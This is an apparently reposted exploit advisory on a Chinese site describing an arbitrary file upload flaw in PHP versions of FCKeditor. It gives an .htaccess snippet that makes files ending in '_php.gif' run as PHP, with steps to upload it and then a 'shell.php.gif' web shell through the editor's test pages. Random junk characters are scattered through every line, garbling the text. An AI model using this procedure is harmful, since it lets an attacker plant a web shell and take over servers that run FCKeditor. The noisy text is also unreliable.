FCKeditor所有php版本Upload上传漏洞2 u3 ^, M1 r: v' n4 V6 h5 Z$ {
作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07
$ X. i' [( V6 {减小字体 增大字体9 a2 E& f1 G+ _( y5 _+ U& N+ r
[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability2 c* \/ Q! K P# k
[+] Date: 2011
) @9 a- B% l5 D$ q[+] Author : sinesafe.cn
, F4 c. ~2 t0 v8 Y[+] Website : WwW.sinesafe.cn* w' O* | v4 S# w
———————————————————5 T/ d: d" ]0 D* S" F
1.create a htaccess file:9 e; B; e9 b% l1 g
code:
g" ^5 A* G1 }; n5 f" _% e, P" i<FilesMatch “_php.gif”>* R( K f( A" Y8 t
SetHandler application/x-httpd-php; D) |1 ?( |' m( W1 J
</FilesMatch>
* B+ u8 @/ i2 n
- X1 b9 d3 p8 p a( Q0 ]2.Now upload this htaccess with FCKeditor.
% o. P: W N& E: m7 n
" j: N3 U0 o2 c% e9 qhttp://www.sinesafe.cn/FCKeditor ... er/upload/test.html) a) S4 m$ f3 Y, i( K. W5 `' s
+ d4 k! O2 o& ^" h3 ?) Chttp://www.sinesafe.cn/FCKeditor ... onnectors/test.html
# l- j0 H6 l: F6 Z
2 p9 \" F, l j" }: U% |1 [' q———————————————————————————————-
2 A# ^! ?2 T4 _6 u! R2 v6 M( M, f' m3.Now upload shell.php.gif with FCKeditor.; c1 V* V) e9 b6 O5 K$ x( ]+ S
4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.
' x" e0 w$ C5 {' q; ~1 p. C5.http://www.sinesafe.cn/anything/shell_php.gif" O0 A7 l' f$ r1 T
6.Now shell is available from server. | ( u# d8 [5 G/ Z0 G5 U6 U
% z6 q- e( Z- {5 {5 j. B/ {7 R; b6 Q9 k4 I7 l
|